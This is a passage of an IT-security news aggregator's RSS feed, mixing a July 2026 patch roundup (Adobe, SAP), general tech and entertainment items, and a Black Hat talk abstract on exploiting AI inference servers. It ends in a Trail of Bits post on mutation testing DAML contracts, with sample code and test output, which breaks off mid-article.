<p class="wp-block-paragraph"><a href="https://www.ivanti.com/blog/authors/chris-goettl">Chris Goettl</a>, vice-president of product management at Ivanti, noted many software vendors in addition to Microsoft are increasing their security update cadence. For example, Cisco Systems has just shifted to a risk-based, twice-monthly disclosure model (the first and third Wednesday of each month), Mozilla is on a near weekly security update march, and Oracle’s new Critical Security Patch Update (CSPU) program has been delivering targeted critical-severity fixes on the 3rd Tuesday of non-CPU months since May.</p>



<p class="wp-block-paragraph">Nightwing also noted that Adobe issued 12 separate security bulletins for products in its first twice-monthly bulletin. Administrators must treat today’s Priority 1 ColdFusion update (APSB26-82) with urgency, as it patches a critical 9.9 CVSS path traversal vulnerability (CVE-2026-48318). It’s one of 11 ColdFusion vulnerabilities patched. </p>



<p class="wp-block-paragraph">Additionally, retail and web administrators should immediately prioritize Adobe Commerce (APSB26-73), which resolves a 9.6 CVSS flaw allowing unrestricted uploads of dangerous file types (CVE-2026-48356).</p>



<h2 class="wp-block-heading">SAP vulnerabilities</h2>



<p class="wp-block-paragraph"><a href="https://pathlock.com/author/jonathan-stross/">Jonathan Stross</a>, senior product manager for cybersecurity research and innovation at Pathlock, said the most critical of the SAP fixes is Note 3747367, a memory corruption vulnerability in NetWeaver Application Server ABAP, with a CVSS score of 9.9. The vulnerability affects the ABAP Application Server, SAP Kernel, and frontend services tied to SAP GUI for HTML.</p>



<p class="wp-block-paragraph"> According to SAP, an authenticated attacker can trigger logical memory-management errors that may lead to unauthorized data access, data modification, or system unavailability. The likely attack scenario involves a compromised account or malicious insider abusing a crafted request that reaches the vulnerable code path. </p>



<p class="wp-block-paragraph">“Because a successful exploit can impact confidentiality, integrity, and availability at the platform level, while potentially destabilizing a core ABAP system, organizations should treat this as the highest-priority patch in the July release,” Stross said. </p>



<p class="wp-block-paragraph">Prioritize the critical ABAP kernel issue, plus the AppRouter request smuggling note, and the Commerce Cloud sample-credential issue first, he said, because these are the most likely to produce direct security impact in real environments.</p>



<p class="wp-block-paragraph">But do not treat the updated notes as noise, he added. The July overview includes three re-released items that still matter operationally, and this should be reflected in patch planning and change records. The attack surface is distributed: ABAP, Java, BTP, Commerce, SAProuter, UI5, and supporting libraries all appear in the same monthly cycle, so patching needs coordinated platform ownership.</p>



<p class="wp-block-paragraph"><a href="https://onapsis.com/post-author/thomas-fritsch/">Thomas Fritsch</a>, an SAP researcher at Onapsis, described the <a href="https://onapsis.com/blog/sap-security-patch-day-july-2026/">SAP Security notes</a> in detail and noted that SAP teams who can’t immediately install the NetWeaver memory corruption fix can, as a temporary workaround, disable all ICF nodes with a specific property in transaction SICF. However, since the workaround will disable opening transactions in SAP GUI for HTML, it is not an option for all customers and it is strongly recommended to install the patched ABAP Kernel version.</p>



<h2 class="wp-block-heading">Patching should become continuous</h2>



<p class="wp-block-paragraph">“AI is likely to expose new classes of weaknesses, and will introduce some of its own through AI-assisted development,” commented <a href="https://www.linkedin.com/in/thegenemoody/">Gene Moody</a>, Field CTO at Action1. “Logically, with that in mind, the future of updating must become more continuous, more adaptive, and less tied to a fixed calendar. Discovery will not follow business logic; it will be swift and unforgiving. We must accept that, and be just as diligent in our defense, because the cost of failure is higher than the inconvenience of change.” </p>



<p class="wp-block-paragraph">He added, “in my crystal ball, I see a future where Microsoft and others move steadily away from scheduled monthly patch cycles in favor of rolling updates for most security issues in as close to live time as they can be researched and released. That would be a win for the entire industry. Faster patch creation and delivery, paired with more agile practices on the customer side, would finally start to align patching with the pace of modern discovery and exploitation.” </p>



<p class="wp-block-paragraph">“What needs to happen is simple,” he said. “Patching on a calendar is no longer a safe assumption in today’s threat landscape. Patching where and when needed versus scheduled is the only path forward.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Umsatz-Enttäuschung bei IBM]]></title>
<description><![CDATA[IBM macht zu schaffen, dass Kunden aus Angst vor steigenden Preisen lieber in Speicher investieren als in Lösungen des IT-Konzerns. Dessen Zahlen enttäuschen, die Aktie stürzt ab.

Tags: #IBM | #Umsatz]]></description>
<link>https://tsecurity.de/de/3668132/it-security-nachrichten/umsatz-enttaeuschung-bei-ibm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668132/it-security-nachrichten/umsatz-enttaeuschung-bei-ibm/</guid>
<pubDate>Tue, 14 Jul 2026 15:38:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/04/IBM-Quelle-Nick-N-A-Shutterstock-1873982623-1920.jpg" class="attachment-full size-full wp-post-image" alt="IBM" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/04/IBM-Quelle-Nick-N-A-Shutterstock-1873982623-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/04/IBM-Quelle-Nick-N-A-Shutterstock-1873982623-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/04/IBM-Quelle-Nick-N-A-Shutterstock-1873982623-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/04/IBM-Quelle-Nick-N-A-Shutterstock-1873982623-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/04/IBM-Quelle-Nick-N-A-Shutterstock-1873982623-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Umsatz-Enttäuschung bei IBM 1"></p>
    IBM macht zu schaffen, dass Kunden aus Angst vor steigenden Preisen lieber in Speicher investieren als in Lösungen des IT-Konzerns. Dessen Zahlen enttäuschen, die Aktie stürzt ab.

<p>Tags: <a href="https://www.it-daily.net/thema/ibm">#IBM</a> | <a href="https://www.it-daily.net/thema/umsatz">#Umsatz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s Coming to Netflix This Week (July 13 to 19): Every New Movie and Show]]></title>
<description><![CDATA[Netflix has a packed schedule for the week of July 13 through July 19, 2026, with new original series, returning favorites, blockbuster movies, documentaries, live sports, and international releases. Whether you enjoy romantic dramas, comedy, thrillers, anime, or action franchises, this week's li...]]></description>
<link>https://tsecurity.de/de/3665389/ios-mac-os/whats-coming-to-netflix-this-week-july-13-to-19-every-new-movie-and-show/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665389/ios-mac-os/whats-coming-to-netflix-this-week-july-13-to-19-every-new-movie-and-show/</guid>
<pubDate>Mon, 13 Jul 2026 15:25:47 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Netflix has a packed schedule for the week of July 13 through July 19, 2026, with new original series, returning favorites, blockbuster movies, documentaries, live sports, and international releases. Whether you enjoy romantic dramas, comedy, thrillers, anime, or action franchises, this week's lineup offers something for every kind of viewer.



The biggest highlights include the feature-length finale Heartstopper Forever, Will Ferrell's new comedy series The Hawk, and the arrival of the complete Hunger Games film collection. Netflix is also expanding its lineup with live sports, podcasts, Korean dramas, and Japanese series throughout the week.



Biggest Netflix Releases This Week



TitleRelease DateGenreHeartstopper ForeverJuly 17Romance, DramaThe Hawk Season 1July 16ComedyThe Hunger Games CollectionJuly 14Action, Sci-FiQuarterback Season 3July 14Sports DocumentaryThe Ultimatum: Marry or Move On Season 4July 15RealityThe East PalaceJuly 17Fantasy K-DramaThe Walking Dead: Daryl Dixon Season 3July 19Horror, Action



Top Picks You Shouldn't Miss



Heartstopper Forever




https://www.youtube.com/watch?v=locuQ-skySE




Nick and Charlie return for one final chapter in Heartstopper Forever, a feature-length special that concludes one of Netflix's most popular coming-of-age romances. As Nick prepares for university, both characters face difficult choices about their future together, while their friends also begin new stages of adulthood. The film stars Kit Connor and Joe Locke and arrives on Friday, July 17.



The Hawk




https://www.youtube.com/watch?v=sSRJ6PXHx88




Will Ferrell headlines Netflix's newest comedy series as Lonnie "The Hawk" Hawkins, a former golf champion who refuses to retire. Despite his age and injuries, he attempts one final comeback while competing against his talented son. The series premieres on Thursday, July 16.



The Hunger Games Collection



Fans of dystopian action can binge the entire franchise beginning Tuesday, July 14. Netflix is adding:




The Hunger Games (2012)



Catching Fire (2013)



Mockingjay Part 1 (2014)



Mockingjay Part 2 (2015)



The Ballad of Songbirds &amp; Snakes (2023)




The addition of the 2023 prequel makes this one of the biggest licensed movie collections arriving this month.



Full Netflix Release Schedule



DateNew ReleasesJuly 13 (Monday)Golden Kamuy: The Abashiri Prison Raid, Hot Ones: Extra Heat, Jim Thorpe: Lit by Lightning, Mile End Kicks, MLB Home Run Derby (LIVE), On Purpose with Jay ShettyJuly 14 (Tuesday)Quarterback Season 3, Technically, The Hunger Games collectionJuly 15 (Wednesday)Snowden, The Tick Seasons 1 and 2, The Ultimatum Season 4July 16 (Thursday)The Hawk, Me Before Me, Love You So Bad, The Body in the LockerJuly 17 (Friday)Heartstopper Forever, Heartstopper Forever: Official Podcast, 23 000 Lives, Desire, The East Palace, The Map of LongingJuly 18 (Saturday)Spooky in LoveJuly 19 (Sunday)The Walking Dead: Daryl Dixon Season 3, Soar High!, You Can't Expense This!



Other Notable Arrivals



Several additional releases deserve attention this week.




Quarterback Season 3 follows NFL stars Jayden Daniels, Baker Mayfield, Cam Ward, and Joe Flacco through another football season.



The East Palace introduces a supernatural mystery set inside a haunted royal palace.



23 000 Lives tells the true story of volunteers rescuing refugees in the Mediterranean.



Desire delivers a suspenseful Mexican thriller centered on a dangerous affair.



On Purpose with Jay Shetty expands the popular podcast into a Netflix video series featuring celebrity interviews.




Quick Watch Guide



Looking ForWatchRomanceHeartstopper ForeverComedyThe HawkActionThe Hunger Games CollectionReality TVThe Ultimatum Season 4SportsQuarterback Season 3DocumentaryJim Thorpe: Lit by LightningK-DramaThe East Palace, Spooky in LoveZombie DramaThe Walking Dead: Daryl Dixon Season 3



Final Thoughts



The week of July 13 to July 19 is one of Netflix's strongest lineups this month. The emotional conclusion of Heartstopper, the arrival of The Hunger Games franchise, and Will Ferrell's new comedy The Hawk headline a schedule that also includes documentaries, live sports, reality shows, anime, and international originals.



If you're planning a weekend binge, this week's releases provide plenty of options across every major genre.]]></content:encoded>
</item>
<item>
<title><![CDATA[Heartstopper Forever release date and time on Netflix — how to stream Nick and Charlie's final farewell in the US, UK and Australia]]></title>
<description><![CDATA[Heartstopper Forever will be the final time we ever see Nick, Charlie, and the gang on Netflix — here's the release information you'll need to know.]]></description>
<link>https://tsecurity.de/de/3663307/it-nachrichten/heartstopper-forever-release-date-and-time-on-netflix-how-to-stream-nick-and-charlies-final-farewell-in-the-us-uk-and-australia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663307/it-nachrichten/heartstopper-forever-release-date-and-time-on-netflix-how-to-stream-nick-and-charlies-final-farewell-in-the-us-uk-and-australia/</guid>
<pubDate>Sun, 12 Jul 2026 15:01:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Heartstopper Forever will be the final time we ever see Nick, Charlie, and the gang on Netflix — here's the release information you'll need to know.]]></content:encoded>
</item>
<item>
<title><![CDATA[Facial Recognition in UK Shops Will Soon Instantly Alert Police About Offenders]]></title>
<description><![CDATA[Facial recognition technology in U.K. shops "will soon alert police in real time to the presence of serious offenders," reports The Guardian, "with civil liberties groups warning of a 'dangerous escalation' towards surveillance and criminalisation in the retail sector."

Facewatch, a facial recog...]]></description>
<link>https://tsecurity.de/de/3662955/it-security-nachrichten/facial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662955/it-security-nachrichten/facial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders/</guid>
<pubDate>Sun, 12 Jul 2026 10:07:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Facial recognition technology in U.K. shops "will soon alert police in real time to the presence of serious offenders," reports The Guardian, "with civil liberties groups warning of a 'dangerous escalation' towards surveillance and criminalisation in the retail sector."

Facewatch, a facial recognition system used by more than 100 businesses including Sainsbury's, B&amp;M and Spar to monitor thieves, said it was launching a UK-first feature to "alert police instantly when the most serious offenders trigger a live facial recognition match". Facewatch's chief executive, Nick Fisher, said the "unique technical development" would be launched in autumn and would warn police in an average of four seconds when the "worst offenders" were flagged on its network... Charlie Whelton, the policy and campaigns officer at [civil liberties nonprofit] Liberty, said it was concerned about this "untested, opaque development" and the way facial recognition technology had been allowed to "proliferate without anything to govern it". 
"It's not against the law to walk into a shop even if you've committed crimes in the past," he said. "The idea of calling the police on somebody who hasn't committed a crime, but there's a concern they might, is really upending the way we do things. And of course, it's not infallible. These systems do make mistakes, and it's very hard to argue with that when it happens to you." A number of people have been forced to leave shops after being falsely identified by Facewatch technology as a shoplifter, with some describing it as "Orwellian" and saying they felt as though they were "guilty until proven innocent"... 

The use of the Facewatch technology looks set to quickly expand, with Sainsbury's recently announcing plans to increase its use from 55 stores to more than 200 by the end of the year. Facewatch said it alerted retailers almost 300,000 times that a "known repeat offender" had entered a store during the first six months of 2026, and that its system allowed staff to intervene "before theft, abuse or violence could occur or escalate"... [E]xperts argue the use of facial recognition technology in shops to catch shoplifters is disproportionate. Nuala Polo, the UK public policy lead at the Ada Lovelace Institute, which studies the impact of AI on society, said: "There are other, much less intrusive means that you can use to catch shoplifters where you don't need to be scanning millions of faces every day, virtually without consent...." 

The campaign group Big Brother Watch has criticised police for "inserting themselves into this cowboy operation" and said people would be matched against "a secret blacklist compiled by unaccountable businesses and private security guards".<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Facial+Recognition+in+UK+Shops+Will+Soon+Instantly+Alert+Police+About+Offenders%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F12%2F0259226%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F12%2F0259226%2Ffacial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/12/0259226/facial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sharing our data privacy commitments for the AI era]]></title>
<description><![CDATA[More and more companies want to adopt the latest cloud-based artificial intelligence (AI) and machine learning (ML) technologies, but they are subject to an increasing array of data privacy regulations. This is an important concern for customers, who are interested in using AI and ML systems to d...]]></description>
<link>https://tsecurity.de/de/3662844/it-security-nachrichten/sharing-our-data-privacy-commitments-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662844/it-security-nachrichten/sharing-our-data-privacy-commitments-for-the-ai-era/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>More and more companies want to adopt the latest cloud-based artificial intelligence (AI) and machine learning (ML) technologies, but they are subject to an increasing array of data privacy regulations. This is an important concern for customers, who are interested in using AI and ML systems to drive better business outcomes while complying with new data privacy laws.</p><p>Today we’re outlining how our AI/ML Privacy Commitment reflects our belief that customers should have both the <a href="https://cloud.google.com/security/">highest level of security</a> and the highest level of control over data stored in the cloud. As Google Cloud CEO Thomas Kurian recently <a href="https://cloud.google.com/blog/products/identity-security/how-google-cloud-is-addressing-data-sovereignty-in-europe-2020">shared</a>, we have heavily invested in providing customers with the capabilities they need to prevent unauthorized access to their data. </p><p>“This [AI/ML Privacy Commitment] is the first of its kind in the industry, and demonstrates the company's focus on building trust with customers,” said Nick McQuire, Senior Vice President, Enterprise Research - CCS Insight </p><p>We have always maintained that you control your data and we process it according to the agreement(s) we have with you. Furthermore, we will not and cannot look at it without a legitimate need to support your use of the service -- and even then it is only with your permission. Here are some of the additional measures we take to ensure your privacy: (reference: <a href="https://cloud.google.com/terms">GCP Terms</a>).</p><p>In addition to these commitments, for AI/ML development, we don’t use data that you provide us to train our own models without your permission. And if you want to work together to develop a solution using any of our AI/ML products, by default our teams will work only with data that you have provided and that has identifying information removed. We work with your raw data only with your consent and where the model development process requires it. </p><p>At Google Cloud, we are committed to giving you increased control and visibility over your data. Transparency creates trust, and trust is necessary for any business to succeed in this arena. That’s why we led the way in providing meaningful transparency into <a href="https://cloud.google.com/access-transparency/">provider access to customer data</a> and now we’re extending that transparency to our AI and ML work. Helping you address global privacy and data protection requirements enables you to apply machine learning to accelerate your business with confidence.  </p><p>"Google Cloud's AI/ML Privacy Commitment is the latest move by the company to ensure its customers have greater control and visibility over their data in the cloud...This commitment also underscores the importance of proactive policies and tools to enable security and privacy in machine learning, which based on our data, is more important than ever,” CCS Insight’s McQuire continued. </p><p>To learn more about our three pillars of sovereignty in Google Cloud, see this <a href="https://cloud.google.com/blog/products/identity-security/how-google-cloud-is-addressing-data-sovereignty-in-europe-2020">blog post</a>.  And to learn more about Google Cloud’s commitment to more accountable products and a culture of responsible innovation, please see our perspective on <a href="https://cloud.google.com/responsible-ai">Responsible AI</a>.</p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[mcpfz-probe: an eBPF runtime probe that catches what an MCP server actually does during fuzzing]]></title>
<description><![CDATA[submitted by    /u/BeautifulFeature3650   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655785/reverse-engineering/mcpfz-probe-an-ebpf-runtime-probe-that-catches-what-an-mcp-server-actually-does-during-fuzzing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655785/reverse-engineering/mcpfz-probe-an-ebpf-runtime-probe-that-catches-what-an-mcp-server-actually-does-during-fuzzing/</guid>
<pubDate>Thu, 09 Jul 2026 04:08:55 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/BeautifulFeature3650"> /u/BeautifulFeature3650 </a> <br> <span><a href="https://github.com/Agent-Hellboy/mcpfz-probe">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1ur6eki/mcpfzprobe_an_ebpf_runtime_probe_that_catches/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nick Desaulniers returns as a maintainer for LLVM/Clang support in the kernel: "I'm coming back. I will return. I will possess your body, and I'll make LKML burn."]]></title>
<description><![CDATA[submitted by    /u/anh0516   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655745/linux-tipps/nick-desaulniers-returns-as-a-maintainer-for-llvmclang-support-in-the-kernel-im-coming-back-i-will-return-i-will-possess-your-body-and-ill-make-lkml-burn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655745/linux-tipps/nick-desaulniers-returns-as-a-maintainer-for-llvmclang-support-in-the-kernel-im-coming-back-i-will-return-i-will-possess-your-body-and-ill-make-lkml-burn/</guid>
<pubDate>Thu, 09 Jul 2026 03:54:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/anh0516"> /u/anh0516 </a> <br> <span><a href="https://www.phoronix.com/news/Nick-Desaulniers-LLVM-Linux">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uqt0th/nick_desaulniers_returns_as_a_maintainer_for/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat Europe 2025 | Breaking AI Inference Systems: Lessons From Pwn2Own Berlin]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 0x - Views:0 At Pwn2Own Berlin 2025, AI systems made their debut as official competition targets. This talk documents our successful exploitation of real-world AI infrastructure in that context focusing on vulnerabilities we discovered and demonstrated in Ollama and...]]></description>
<link>https://tsecurity.de/de/3654668/it-security-video/black-hat-europe-2025-breaking-ai-inference-systems-lessons-from-pwn2own-berlin/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654668/it-security-video/black-hat-europe-2025-breaking-ai-inference-systems-lessons-from-pwn2own-berlin/</guid>
<pubDate>Wed, 08 Jul 2026 16:47:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Qy1Uu5Wdkg8?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>At Pwn2Own Berlin 2025, AI systems made their debut as official competition targets. This talk documents our successful exploitation of real-world AI infrastructure in that context focusing on vulnerabilities we discovered and demonstrated in Ollama and NVIDIA Triton Inference Server.<br />
<br />
We detail our security research methodology, which included threat modeling, file format fuzzing, and plugin analysis. In Ollama, we discovered multiple bugs before and during the competition, including an authentication bypass (CVE issued) and a heap overflow found via fuzzing—although it was patched three weeks before the event. In Triton Server, we uncovered a command injection vulnerability in its model configuration pipeline, leading to reliable remote code execution.<br />
<br />
We'll also briefly explore other AI targets such as RedisAI, ChromaDB, and NVIDIA's container runtime, including insight into a potential stack overflow rediscovery via fuzzing.<br />
<br />
This session blends concrete technical details with broader insight, sharing actionable takeaways for red teamers and defenders working with inference systems. Attendees will leave with a solid understanding of how to audit, attack, and better defend AI model infrastructure.<br />
<br />
By: <br />
Patrick Ventuzelo  |  CEO & Founder, Fuzzinglabs<br />
Nabih Benazzouz  |  COO, Fuzzinglabs<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#breaking-ai-inference-systems-lessons-from-pwn2own-berlin-48948<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mutation testing comes to DAML]]></title>
<description><![CDATA[In April we released Mewt, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DA...]]></description>
<link>https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In April we released <a href="https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/">Mewt</a>, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and use <code>mewt run</code>.</p>
<p>For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not.</p>
<h2>Why DAML’s coverage reports lie</h2>
<p>Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least <a href="https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/">2019</a>, and <a href="https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/">our primer on finding the bugs your tests don’t catch</a> shows how a green suite can still miss the bug that matters.</p>
<p>DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each choice was exercised, not what happened inside it. A test that exercises a choice once and asserts nothing about the result reports that choice as covered. The report prints the same green percentage whether the test verifies the outcome or discards it.</p>
<h2>How mutation testing works</h2>
<p>Instead of asking whether your tests reached the code, mutation testing grades your tests by sabotaging that code. The engine generates mutants, copies of the code that each carry one small deliberate change: a flipped comparison, a removed branch, a dropped party. It then runs your test suite against each one. A mutant that makes the suite fail is caught; a mutant that passes every test survives. Every survivor is a change your tests let through, and each one is either harmless or a potential bug. The harmless ones are equivalent code no test could distinguish or a branch no execution reaches, and you can set those aside. The rest are a to-do list: each one is a specific test you are missing, a case your suite should check but does not, occasionally with a real bug sitting behind the gap. The primer above describes a real audit where a mutation campaign surfaced a high-severity bug that the project’s tests had missed.</p>
<h2>Mutation testing forces the unhappy path</h2>
<p>A DAML contract encodes rights and obligations between named parties: who holds what, who owes what to whom, and who must authorize each step. A party is not an anonymous address. It represents a real organization or person, and the contract is the rulebook for how those parties interact, including which of them can take which action, what each is allowed to see, and what stays private between them.</p>
<p>Authorization is how that rulebook is enforced: who may take which action. It is also easy to get wrong in ordinary ways, such as a typo in a controller clause, a missing party, an extra one left over from a refactor. Every combination type-checks, so nothing rejects it before it ships. A static analyzer can flag suspicious patterns, but it has no way to know which party should hold which authority on your contract. That knowledge lives in your specification, and for most projects, the only executable form of the specification is the test suite. Happy-path tests supply every signature the contract asks for and confirm the transaction succeeds. They never try the negative case—removing a required signature and checking that the ledger rejects the transaction—so they never actually test whether that signature was required at all. If the tests don’t encode that rule, nothing downstream can recover it. Mutation testing is what tells you whether they do.</p>
<p>A green test run tells you your tests passed today. Mutation testing asks the harder question: would your tests catch a mistake, now or after the next code change? Where the answer is no, you have found a test case worth writing.</p>
<h2>What Mewt adds for DAML</h2>
<p>Mewt parses every language it supports with a tree-sitter grammar. As of mid-2026, there is no maintained tree-sitter grammar for DAML, so we reused the upstream <code>tree-sitter-haskell</code> grammar. DAML is Haskell-shaped, but its contract constructs (<code>template</code>, <code>choice</code>, <code>controller</code>, and <code>signatory</code>) are not Haskell, and the grammar parses them as error-recovered subtrees. That matters less than it sounds. The common mutations still work on DAML’s ordinary expressions, so Mewt swaps arithmetic and comparison operators, flips Booleans, and removes branches just as it does in any other language, with only small adjustments where DAML’s surface syntax differs (DAML writes <code>/=</code> where most languages write <code>!=</code>). We got most of the value of a from-scratch grammar without building one.</p>
<p>The new engineering went into DAML’s authorization primitives, where the authorization bugs from the previous section live. Mewt adds two DAML-specific mutations:</p>
<ul>
<li>
<p><strong>Controller party swap</strong> (CPS in Mewt’s output): replace one party in a <code>controller</code> clause with another party that is in scope at that site.</p>
</li>
<li>
<p><strong>Controller party removal</strong> (CPR): drop one party from a multi-party controller list.</p>
</li>
</ul>
<p>Both target the same question: if the set of parties allowed to exercise this choice silently changed, would any test fail? They are a deliberately small starting set aimed at the bug class above, and more DAML-specific mutations are in the pipeline.</p>
<p>Driving a campaign needs no new harness. A short <code>mewt.toml</code> names the files to mutate and the test command (<code>dpm test</code> for a Daml 3 project), and <code>mewt run</code> does the rest, reporting each mutant as caught or surviving. The setup is deliberately small: trying it on your own project costs minutes, and we encourage exactly that.</p>
<h2>What a surviving mutant looks like</h2>
<p>Picture a conditional payment between a buyer and a seller: the buyer sets money aside for the goods, and paying it out to the seller requires both parties to sign off. The buyer’s signature is the delivery confirmation. In DAML, that policy is one line: the <code>controller</code> line on the <code>Release</code> choice.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">template ConditionalPayment
 with
 buyer : Party
 seller : Party
 amount : Decimal
 where
 signatory buyer
 observer seller

 choice Release : ()
 with
 paid : Decimal
 controller buyer, seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 1: A payment that requires both the buyer and the seller to approve its release</span></figcaption>
</figure>
<p>A typical happy-path test creates the payment and has both parties approve the release. The <code>actAs buyer &lt;&gt; actAs seller</code> line submits the command with both parties’ authority:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">testHappyPath : Script ()
testHappyPath = script do
 buyer &lt;- allocateParty "Buyer"
 seller &lt;- allocateParty "Seller"
 payment &lt;- submit buyer do
 createCmd ConditionalPayment with
 buyer
 seller
 amount = 100.0
 submit (actAs buyer &lt;&gt; actAs seller) do
 exerciseCmd payment Release with paid = 100.0
 pure ()</code></pre>
 <figcaption><span>Figure 2: The happy-path test. It passes, and coverage reports 100%.</span></figcaption>
</figure>
<p>The test passes, and by the usual measure the suite looks complete: running <code>dpm test</code> with coverage reporting enabled shows full coverage.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">$ dpm test --show-coverage --coverage-ignore-choice Archive
testHappyPath: ok, 0 active contracts, 2 transactions.
- Internal templates: 1 defined, 1 (100.0%) created
- Internal template choices: 1 defined, 1 (100.0%) exercised</code></pre>
 <figcaption><span>Figure 3: The coverage report for the happy-path test. Every template is created and every choice is exercised, for 100% coverage.</span></figcaption>
</figure>
<p>The <code>--coverage-ignore-choice Archive</code> flag deserves a word. Every DAML template automatically gets an implicit <code>Archive</code> choice. It is not part of the business logic under test, so we exclude it for simplicity. With it included, this one-choice template would report 50% even though the test exercises everything we wrote.</p>
<p>Run Mewt on the project and it generates seven mutants. The test suite catches three of them. Four survive. Here is one of the survivors, shown as the diff Mewt reports:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang=""> choice Release : ()
 with
 paid : Decimal
- controller buyer, seller
+ controller seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 4: The controller-removal mutant that survives the test suite</span></figcaption>
</figure>
